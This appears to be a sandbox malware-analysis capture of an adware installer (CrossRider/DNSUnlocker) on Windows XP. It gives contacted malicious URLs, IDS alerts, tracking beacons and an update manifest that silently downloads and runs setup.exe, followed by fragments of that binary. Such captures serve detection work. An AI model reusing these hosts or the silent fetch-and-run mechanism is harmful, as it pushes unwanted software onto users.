    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014
    hxxp://js.newcloudrack.com/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028 69.16.175.10
    hxxp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/setup.exe 185.31.17.249
    hxxp://js.newcloudrack.com/plugins/mins/273.js?ver=6&rnd=41 69.16.175.10
    hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 69.16.175.42
    hxxp://js.newcloudrack.com/plugins/mins/376.js?ver=12&rnd=8467 69.16.175.10
    hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg 69.16.175.10
    hxxp://stats.newdemoonlinecloud.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 54.231.17.4
    hxxp://update.newdemoonlinecloud.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 69.16.175.10
    hxxp://crl.thawte.com/ThawteTimestampingCA.crl 23.50.101.163
    hxxp://js.newcloudrack.com/plugins/mins/220.js?ver=46&rnd=8467 69.16.175.10
    hxxp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/180.js?ver=20&rnd=8467 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/311.js?ver=4&rnd=41 69.16.175.10
    hxxp://stats.newdemoonlinecloud.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 54.231.17.4
    hxxp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/391.js?ver=1&rnd=41 69.16.175.10
    hxxp://update.newdemoonlinecloud.com/installer_updates/002201/update.json 69.16.175.10
    hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 69.16.175.42
    hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 77.222.148.99
    hxxp://js.newcloudrack.com/plugins/mins/223.js?ver=9&rnd=41 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/91.js?ver=186&rnd=8467 69.16.175.10
    hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029 69.16.175.42
    hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/288.js?ver=4&rnd=41 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/184.js?ver=11&rnd=8467 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/345.js?ver=47&rnd=8467 69.16.175.10
    hxxp://crl.comodoca.com/COMODOCodeSigningCA2.crl 104.16.89.188
    hxxp://stats.newdemoonlinecloud.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 54.231.17.4
    hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 77.222.148.99
    hxxp://js.newcloudrack.com/plugins/mins/424.js?ver=3&rnd=41 69.16.175.10
    hxxp://logs.newdemoonlinecloud.com/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 69.16.175.42
    hxxp://js.newcloudrack.com/plugins/mins/380.js?ver=1&rnd=41 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/102.js?ver=15&rnd=8467 69.16.175.10
    hxxp://stats.newdemoonlinecloud.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 54.231.17.4
    hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl 23.50.101.163
    hxxp://js.newcloudrack.com/plugins/mins/246.js?ver=17&rnd=8467 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/339.js?ver=3&rnd=41 69.16.175.10
    hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 69.16.175.42
    hxxp://js.newcloudrack.com/plugins/mins/390.js?ver=1&rnd=41 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/200.js?ver=6&rnd=41 69.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/354.js?ver=2&rnd=8467 69.16.175.10
    hxxp://stats.newdemoonlinecloud.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481 54.231.17.4
    hxxp://js.newcloudrack.com/plugins/mins/253.js?ver=2&rnd=8467 69.16.175.10


    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    ET MALWARE Win32/Toolbar.CrossRider.A Checkin
    ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers

    Traffic

    GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:35 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1456422146"
    Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT
    Cache-Control: private, must-revalidate, max-age=900
    Content-Length: 1681
    Content-Type: application/xml; charset=utf-8
    X-HW: 1456422155.dop003.fr7.t,1456422155.cds047.fr7.pr
    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
    er>151</Ver>.  <ShortName>winservice86</ShortName>
    ;.  <Description>winservice</Description>.  <PublisherN
    ame>Corporate Inc</PublisherName>.  <HomePageLink>NA<
    ;/HomePageLink>.  <JSLink>hXXp://js.newcloudrack.com/plugin/a
    pps/64755/js/na/ie/app_code.js</JSLink>.  <GroupID>0</G
    roupID>.  <Domain>NA</Domain>.  <RunInIframe>fals
    e</RunInIframe>.  <ThanksURL>NA</ThanksURL>.  <Em
    ailSignature>NA</EmailSignature>.  <SettingsURL>NA</
    SettingsURL>.  <CertifiedInstall>NA</CertifiedInstall>.
      <ExposeSites>NA</ExposeSites>.  <RemoteFBApiURL>NA
    </RemoteFBApiURL>.  <DisableIE>true</DisableIE>.  &l
    t;DisableFF>true</DisableFF>.  <EnableSearchIE>false<
    ;/EnableSearchIE>.  <EnableSearchFF>false</EnableSearchFF&
    gt;.  <AddressbarIE>NA</AddressbarIE>.  <AddressbarFF&g
    t;NA</AddressbarFF>.  <AddressbarFFEnhanced>NA</Address
    barFFEnhanced>.  <AddressbarCR>NA</AddressbarCR>.  <
    NewTabURL>NA</NewTabURL>.  <NewTabEmbed>NA</NewTabEm
    bed>.  <OpenSearchURL>NA</OpenSearchURL>.  <Backgrou
    ndJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.
    js</BackgroundJS>.  <BackgroundVer>17</BackgroundVer>
    ;.  <Manifest>NA</Manifest>.  <ChangePrevious>fa
    <<< skipped >>>
    

    GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp;cup
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    If-Match: "XX-K_Z3raSdv_NbJiy9qMtWg5rI"
    Host: update.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 412 Precondition Failed
    Date: Thu, 25 Feb 2016 17:42:22 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1454605844"
    Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT
    Cache-Control: max-age=21600
    Content-Length: 993
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.sr,1456422142.dop003.se1.r,1456422142.cds006.se1.pr,1456422142.cds029.fr7.pr
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">.  <daystart elapsed_seconds="56508"/>.  <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.  
      <updatecheck status="noupdate"/>.    <ping status="ok"/>
    .  </app>.  <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96
    }" status="ok">.        <updatecheck status="ok">.          &
    lt;urls>.            <url codebase="hXXp://cdn.roastfiles2017.co
    m/download/66/60001/DNSUnlocker/"/>.          </urls>.       
       <manifest version="1.3.25.36">.            <packages>. 
                 <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="set
    up.exe" required="true" size="1141502"/>.            </packages&
    gt;.            <actions>.              <action arguments="/v
    erysilent" event="update" run="setup.exe" />.              <acti
    on version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonla
    unchcmd"/>.            </actions>.          </manifest>
    .        </updatecheck>.    <ping status="ok"/>.  </app
    >.</response>.    ....
    <<< skipped >>>

    GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 HTTP/1.1
    

    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x8004219c
    X-Last-HTTP-Status-Code: 412
    X-Retry-Count: 0
    Host: update.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:22 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1454605844"
    Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT
    Cache-Control: max-age=21600
    Content-Length: 993
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">.  <daystart elapsed_seconds="56508"/>.  <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.  
      <updatecheck status="noupdate"/>.    <ping status="ok"/>
    .  </app>.  <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96
    }" status="ok">.        <updatecheck status="ok">.          &
    lt;urls>.            <url codebase="hXXp://cdn.roastfiles2017.co
    m/download/66/60001/DNSUnlocker/"/>.          </urls>.       
       <manifest version="1.3.25.36">.            <packages>. 
                 <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="set
    up.exe" required="true" size="1141502"/>.            </packages&
    gt;.            <actions>.              <action arguments="/v
    erysilent" event="update" run="setup.exe" />.              <acti
    on version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonla
    unchcmd"/>.            </actions>.          </manifest>
    .        </updatecheck>.    <ping status="ok"/>.  </app
    >.</response>...

    

    GET /monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1
    Host: logs.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:39 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1456422159.dop016.fr7.t,1456422159.cds050.fr7.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 
    2016 17:42:39 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
    ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
    Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
    5..Content-Type: image/gif..X-HW: 1456422159.dop016.fr7.t,1456422159.c
    ds050.fr7.c..GIF89a.............,...........D..;..

    

    GET /installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 HTTP/1.1
    Host: stats.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: V0yDluovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=
    x-amz-request-id: 7A4D6F935DEEF740
    Date: Thu, 25 Feb 2016 17:42:16 GMT
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: V0yDlu
    ovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=
    ..x-amz-request-id: 7A4D6F935DEEF740..Date: Thu, 25 Feb 2016 17:42:16 
    GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
    must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
    ....


    GET /apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 HTTP/1.1
    

    Accept: */*
    Host: stats.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: R2kGtHheD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=
    x-amz-request-id: F56AE9D950BAAAD1
    Date: Thu, 25 Feb 2016 17:42:30 GMT
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: R2kGtH
    heD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=
    ..x-amz-request-id: F56AE9D950BAAAD1..Date: Thu, 25 Feb 2016 17:42:30 
    GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
    must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
    ....


    GET /installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1
    

    Host: stats.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: x3E G/Ql8kPOuBCrZ40b2DJUuNe1 KVwbRZXADv5q2NM6mMk UHrkOxzeTK8rxmmglzTyttzfUU=
    x-amz-request-id: 85C0F7272F6CE521
    Date: Thu, 25 Feb 2016 17:42:40 GMT
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....


    GET /apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1
    

    Host: stats.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: I4M97BWeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=
    x-amz-request-id: DCE50181449CA089
    Date: Thu, 25 Feb 2016 17:42:40 GMT
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: I4M97B
    WeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=
    ..x-amz-request-id: DCE50181449CA089..Date: Thu, 25 Feb 2016 17:42:40 
    GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
    must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..

    

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: identity
    Range: bytes=0-5444
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:33 GMT
    Via: 1.1 varnish
    Age: 1601
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 976
    X-Timer: S1456422153.287588,VS0,VE0
    Content-Range: bytes 0-5444/1153385
    Content-Length: 5445
    MZ......................@.............................................
    ..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
    u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
    ......PE..L......K.................^...........0.......p....@.........
    .................@...............................................t....
    .......=..............................................................
    .............p...............................text...L\.......^........
    .......... ..`.rdata.......p.......b..............@[email protected]\......
    .....v..............@....ndata...................................rsrc.
    ...=.......>...z..............@..@.................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ...............................................U....\.}..t .}.F.E.u..H
    [email protected]@..e...E..E.P.u...
    Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
    ........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
    ..u....E..9}[email protected].}[email protected]
    [email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._
    ^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G
    .....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i.
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=5445-13791
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    User-Agent: Microsoft BITS/6.7
    Host: cdn.roastfiles2017.com
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Server: nginx/1.7.2
    Content-Type: application/octet-stream
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=setup.exe
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: public, max-age=0
    Pragma: no-cache
    Accept-Ranges: bytes
    Date: Thu, 25 Feb 2016 17:42:37 GMT
    Via: 1.1 varnish
    Age: 1605
    Connection: keep-alive
    X-Served-By: cache-fra1238-FRA
    X-Cache: HIT
    X-Cache-Hits: 983
    X-Timer: S1456422157.750239,VS0,VE0
    Content-Range: bytes 5445-13791/1153385
    Content-Length: 8347
    .E.P...Q..E.P...Q.;.}..E.....j...........j...S.~...j....u...j#...l...V
    .E..t;....u.Sj...,........E.V.E..E......k8..W.\0..a8...\8..E.f.M.PS.u.
    .}..E.f.M... ...E.P..`q@...........=....t.h.. .j.S.&8..P..0........~..
    .....B..h...3.3.;.t.S......U...;.t.j........9].t.j".......j......PSWV.
    . q@..?...j..E.!N~......j....x...j..E..n...Ph.....E.VP.u.W..$q@...;E..
    o...9].u j..M.....;[email protected]@...j"......M....QP.u.
    .....P.B.....;........Y...P......u....E.j..E......j..E.......M.SQ....B
    ....SQSSSPW.E....... p@.....<[email protected]#[email protected]..
    [email protected]@...u..]..u......h.....G..
    .j3...4...;[email protected].}..t.9M.t..}..u#.
    E..E..E...0.q.63.9].V....E..L5...\...M..Uh.........j........;.........
    9][email protected]@[email protected].
    ......V..4..P.....j..S....u..u.P.42...........P.....9][email protected]
    [email protected][email protected]..([email protected]..]..........E.
    ..o........;.~..M.8.......V.]..J4..9]..E.~}.u..E.SP.E.j.P.u...,[email protected]
    .}..u_9].u!.}..t .}..t%.E...>F:..E.t@;u.|..9..E.PW..3........E.8E.t
    .<.t.<.u...>[email protected]...>;......8........u.Sj.
    [email protected]]........7...8.......V.{[email protected]...\...P
    W.^3..P..<[email protected]?.E........M...j........\...QP..@[email protected]....
    ..#...PW..2........PV.5...j..E.f....l.....V.u........u.j..V...V..0..j.
    [email protected]@[email protected].....;.t{S......u.W......u.j@..
    ..;..u.t4.u.VS.u..W........F....Q..VP.M.../[email protected]
    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
    

    Accept: */*
    Accept-Encoding: identity
    Range: bytes=13792-25330
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
